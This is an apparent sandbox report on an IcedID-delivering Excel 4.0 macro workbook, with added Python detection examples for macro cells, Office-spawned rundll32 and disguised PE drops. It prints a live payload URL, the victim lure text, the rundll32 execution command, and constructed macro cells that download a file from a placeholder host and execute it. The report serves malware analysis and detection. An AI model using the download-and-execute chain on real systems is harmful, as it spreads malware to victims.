Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/marketplace?aws=hp
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/pt/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/ru/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/search
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/search/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/search/?searchQuery=
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/th/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/tr/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/tw/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://aws.amazon.com/vi/
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/console/home
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp String found in binary or memory: https://d1.awsstatic.com
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
Source: document-1915351743.xls String found in binary or memory: https://miraclecollagen.co.za/ds/1802.Dc
Source: document-1915351743.xls String found in binary or memory: https://miraclecollagen.co.za/ds/1802.gif
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/AmazonECSAnywherePreview.html?hp=tile&amp;so-exp=below
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://press.aboutamazon.com/press-releases/aws
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
Source: idefje.ekfd.0.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/awscloud
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://www.amazon.jobs/aws
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://www.twitch.tv/aws
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown HTTPS traffic detected: 197.242.147.47:443 -> 192.168.2.22:49165 version: TLS 1.2

E-Banking Fraud:

Yara detected IcedID
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2324, type: MEMORY
Source: Yara match File source: 3.2.rundll32.exe.7feea7c0000.10.unpack, type: UNPACKEDPE

System Summary:

Found malicious Excel 4.0 Macro
Source: document-1915351743.xls Initial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing" 11 from the yellow bar above 12 13 @Once You have Enable Editing, please click "E
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
Source: Document image extraction number: 6 Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "EnableConte
Found Excel 4.0 Macro with suspicious formulas
Source: document-1915351743.xls Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: document-1915351743.xls Initial sample: Sheet size: 4930
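The three macro signatures above (urlmon registration, an EXEC formula, an oversized hidden macro sheet) can be approximated with a static scoring pass over the workbook's cells. The Python below is an added example, not part of this Joe Sandbox report and not code extracted from the sample: the cells, sheet states and defined names it scores are constructed to resemble the behaviour the signatures describe (with an example.invalid host in place of the real download URL) and were not taken from document-1915351743.xls. In practice the cells would come from a BIFF parser such as oletools' plugin_biff; only the scoring is shown.

```python
"""Heuristic triage of Excel 4.0 (XLM) macro cells.

Added example: not part of the sandbox report and not extracted from the sample.
The cells, sheet states and defined names below are constructed to mirror the
behaviour the report's signatures describe (urlmon registration, a download to
a non-DLL name, EXEC of rundll32 from a hidden macro sheet).
"""
import re
from dataclasses import dataclass

# BoundSheet8 hidden-state values used by the BIFF workbook stream.
VISIBLE, HIDDEN, VERY_HIDDEN = 0, 1, 2

# XLM functions worth weighting during triage.
SUSPICIOUS_FUNCS = {
    "EXEC": 5,                        # launches an arbitrary command line
    "CALL": 4,                        # direct Win32 call
    "REGISTER": 4,                    # binds a DLL export to an alias (urlmon!URLDownloadToFileA)
    "FOPEN": 2, "FWRITE": 2,          # write a dropper to disk
    "FORMULA": 2, "FORMULA.FILL": 2,  # write formulas at runtime (deobfuscation stage)
    "RUN": 2,
    "GET.WORKSPACE": 2,               # environment / sandbox checks
}
SUSPICIOUS_LIBS = ("urlmon", "shell32", "kernel32", "wininet")
FUNC_RE = re.compile(r"\b([A-Z][A-Z0-9.]*)\s*\(")
AUTO_NAME_RE = re.compile(r"_?auto_(open|close|activate)\w*", re.IGNORECASE)
# REGISTER("lib","export","argtypes","alias",...) -> remember the alias so later calls to it count.
REGISTER_RE = re.compile(r'REGISTER\s*\(\s*"([^"]+)"\s*,\s*"([^"]+)"\s*,\s*"[^"]*"\s*,\s*"([^"]+)"',
                         re.IGNORECASE)


@dataclass
class Cell:
    sheet: str
    sheet_state: int      # VISIBLE / HIDDEN / VERY_HIDDEN
    is_macro_sheet: bool  # True for an XLM macro sheet, False for a worksheet
    ref: str
    formula: str


def score_cell(cell, aliases):
    """Return (indicator, weight) pairs for one formula."""
    hits = []
    text = cell.formula.upper()
    for name in sorted(set(FUNC_RE.findall(text))):
        if name in SUSPICIOUS_FUNCS:
            hits.append((name, SUSPICIOUS_FUNCS[name]))
        elif name in aliases:
            hits.append(("alias:" + aliases[name], 4))
    for lib in SUSPICIOUS_LIBS:
        if lib.upper() in text:
            hits.append(("lib:" + lib, 3))
    return hits


def triage(cells, defined_names):
    """Score a workbook; indicators on hidden macro sheets count double."""
    score, findings = 0, []
    for name, target in defined_names.items():
        if AUTO_NAME_RE.fullmatch(name):
            score += 5
            findings.append(f"auto-exec name {name} -> {target}")
    aliases = {}
    for c in cells:
        for lib, export, alias in REGISTER_RE.findall(c.formula):
            aliases[alias.upper()] = f"{lib}!{export}"
    for c in cells:
        hits = score_cell(c, aliases)
        if not hits:
            continue
        mult = 2 if (c.is_macro_sheet and c.sheet_state != VISIBLE) else 1
        for indicator, weight in hits:
            score += weight * mult
            findings.append(f"{c.sheet}!{c.ref}: {indicator}")
    return score, findings


# Constructed input (not from the sample); the URL host is a placeholder.
SAMPLE_NAMES = {"Auto_Open": "Macro1!$A$1"}
SAMPLE_CELLS = [
    Cell("Sheet1", VISIBLE, False, "B2", "=SUM(A1:A5)"),
    Cell("Macro1", VERY_HIDDEN, True, "A1",
         '=REGISTER("urlmon","URLDownloadToFileA","JJCCJJ","d",,1,9)'),
    Cell("Macro1", VERY_HIDDEN, True, "A2",
         '=d(0,"https://example.invalid/ds/1802.gif","..\\idefje.ekfd",0,0)'),
    Cell("Macro1", VERY_HIDDEN, True, "A3",
         '=EXEC("rundll32 ..\\idefje.ekfd,DllRegisterServer")'),
    Cell("Macro1", VERY_HIDDEN, True, "A4", "=HALT()"),
]


def triage_sample_workbook():
    return triage(SAMPLE_CELLS, SAMPLE_NAMES)


if __name__ == "__main__":
    total, notes = triage_sample_workbook()
    print(f"score={total}")
    for n in notes:
        print(" ", n)
```

The alias pass is what makes the "d(...)" download call visible: on its own the cell contains no known XLM function name, which is exactly why loaders register URLDownloadToFileA under a one-letter alias.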
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\idefje.ekfd
Document contains embedded VBA macros
Source: document-1915351743.xls OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif 21249CE24600B1FEAC26A2A9883F3C6DE299681A924BE281630BC3869F0F4044
Source: Joe Sandbox View Dropped File: C:\Users\user\idefje.ekfd 21249CE24600B1FEAC26A2A9883F3C6DE299681A924BE281630BC3869F0F4044
Yara signature match
Source: document-1915351743.xls, type: SAMPLE Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: document-1915351743.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@3/11@5/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\ADFE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF112.tmp
Source: document-1915351743.xls OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32 ..\idefje.ekfd,DllRegisterServer
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32 ..\idefje.ekfd,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\idefje.ekfd,DllRegisterServer
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
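The process tree above (EXCEL.EXE launching rundll32 with a relative path to a file whose extension is not .dll, entering through the DllRegisterServer export) is the pattern behind the "Microsoft Office Product Spawning Windows Shell" Sigma hit. The Python below is an added example, not part of the report and not the Sigma rule itself: it evaluates constructed Sysmon-style process-creation events. The CurrentDirectory value C:\Users\user\Desktop is an assumption, used only to resolve ..\idefje.ekfd to the user-root drop path the report lists.

```python
"""Detection logic for Office -> rundll32 process creation.

Added example: not part of the sandbox report and not the referenced Sigma rule.
Events are constructed in a Sysmon Event ID 1 style; the CurrentDirectory of the
malicious event is an assumption used to resolve the relative module path.
"""
import ntpath
import re

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "mshta.exe", "msiexec.exe"}
DLL_EXTS = {".dll", ".ocx", ".cpl", ".drv"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# [path\]rundll32[.exe] <module>,<export> [args]; the module may be quoted.
RUNDLL32_RE = re.compile(
    r'^\s*(?:"[^"]*rundll32(?:\.exe)?"|\S*rundll32(?:\.exe)?)\s+'
    r'(?P<mod>"[^"]+"|[^\s,]+)\s*,\s*(?P<export>[^\s,]+)',
    re.IGNORECASE,
)


def parse_rundll32(cmdline, cwd):
    """Return (absolute module path, export) or None if not a module,export invocation."""
    m = RUNDLL32_RE.match(cmdline)
    if not m:
        return None
    module = m.group("mod").strip('"')
    # Relative paths such as ..\idefje.ekfd resolve against the process working directory.
    return ntpath.normpath(ntpath.join(cwd, module)), m.group("export")


def evaluate(event):
    """Return the list of reasons an event is suspicious (empty for benign)."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()
    reasons = []
    if parent in OFFICE_IMAGES and child in SHELL_IMAGES:
        reasons.append(f"office process {parent} spawned {child}")
    if child == "rundll32.exe":
        parsed = parse_rundll32(event["CommandLine"], event["CurrentDirectory"])
        if parsed:
            module, export = parsed
            ext = ntpath.splitext(module)[1].lower()
            if ext not in DLL_EXTS:
                reasons.append(f"module {module} has non-DLL extension {ext or '(none)'}")
            if not module.lower().startswith(TRUSTED_DIRS):
                reasons.append(f"module {module} is outside Windows/Program Files")
            if export.lower() == "dllregisterserver":
                reasons.append("DllRegisterServer invoked via rundll32 (loader-style entry point)")
    return reasons


# Constructed events (not taken from the report's logs).
SAMPLE_EVENTS = [
    {   # the report's process tree, with an assumed working directory
        "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
        "Image": r"C:\Windows\System32\rundll32.exe",
        "CommandLine": r"rundll32 ..\idefje.ekfd,DllRegisterServer",
        "CurrentDirectory": r"C:\Users\user\Desktop",
    },
    {   # benign: Explorer opening a Control Panel applet
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\rundll32.exe",
        "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
        "CurrentDirectory": r"C:\Windows",
    },
]


def evaluate_sample():
    return [evaluate(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event, reasons in zip(SAMPLE_EVENTS, evaluate_sample()):
        print(event["CommandLine"], "->", reasons or "benign")
```

Resolving the module path against the working directory matters: a rule that only inspects the command line never sees that ..\idefje.ekfd lands in the user profile root, which is the same location the report's "Drops PE files to the user root directory" signature flags.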

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\idefje.ekfd
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\idefje.ekfd
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\idefje.ekfd
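The two drops above are the same bytes under two names (the report lists one SHA256 for both), and neither name carries a PE extension; that is what "content does not match file extension" means here. The Python below is an added example, not part of the report: it checks for an MZ/PE header, compares the result with the extension, and groups drops by SHA256. Its inputs are a constructed minimal PE header and a constructed GIF, not the real 1802[1].gif payload, so the digests it computes are not the report's.

```python
"""Content-versus-extension check and SHA256 grouping for dropped files.

Added example: not part of the sandbox report. The file bytes are constructed
(a minimal MZ/PE header and a GIF header), not the sample's real payload.
"""
import hashlib
import ntpath
import struct

# Expected leading bytes for common "decoy" extensions.
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".zip": (b"PK\x03\x04",),
}
PE_EXTS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv"}


def is_pe(data):
    """True if data has an MZ header whose e_lfanew points at a PE\\0\\0 signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return 0x40 <= e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def extension_mismatch(path, data):
    """True when the bytes contradict what the extension claims."""
    ext = ntpath.splitext(path)[1].lower()   # cache names like 1802[1].gif still yield .gif
    if is_pe(data):
        return ext not in PE_EXTS
    expected = MAGIC.get(ext)
    if expected is None:
        return False                          # unknown extension, nothing to contradict
    return not data.startswith(expected)


def triage_drops(drops):
    """Return per-file verdicts and a map of SHA256 -> paths for duplicated content."""
    by_hash, results = {}, []
    for path, data in drops:
        digest = hashlib.sha256(data).hexdigest()
        by_hash.setdefault(digest, []).append(path)
        results.append({"path": path, "sha256": digest,
                        "pe": is_pe(data), "mismatch": extension_mismatch(path, data)})
    duplicates = {h: paths for h, paths in by_hash.items() if len(paths) > 1}
    return results, duplicates


def _fake_pe():
    """Constructed 72-byte blob: MZ, e_lfanew = 0x40, PE signature at 0x40. Not a real binary."""
    hdr = bytearray(0x48)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    hdr[0x40:0x44] = b"PE\x00\x00"
    return bytes(hdr)


FAKE_PE = _fake_pe()
# Constructed drop list: the report's two paths with the same bytes, plus a genuine GIF.
SAMPLE_DROPS = [
    (r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif", FAKE_PE),
    (r"C:\Users\user\idefje.ekfd", FAKE_PE),
    (r"C:\Users\user\Pictures\logo.gif", b"GIF89a" + b"\x00" * 10),
]


def triage_sample_drops():
    return triage_drops(SAMPLE_DROPS)


if __name__ == "__main__":
    verdicts, dups = triage_sample_drops()
    for v in verdicts:
        print(f"{v['mismatch']!s:5} pe={v['pe']!s:5} {v['path']}")
    for digest, paths in dups.items():
        print(digest[:16], "seen as", len(paths), "files")
```

The e_lfanew bounds check is the part worth keeping: testing only for a leading "MZ" will flag any DOS stub and miss nothing, but it also accepts junk, so the signature lookup is what turns the heuristic into a PE check.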

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\idefje.ekfd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (logged 16 times)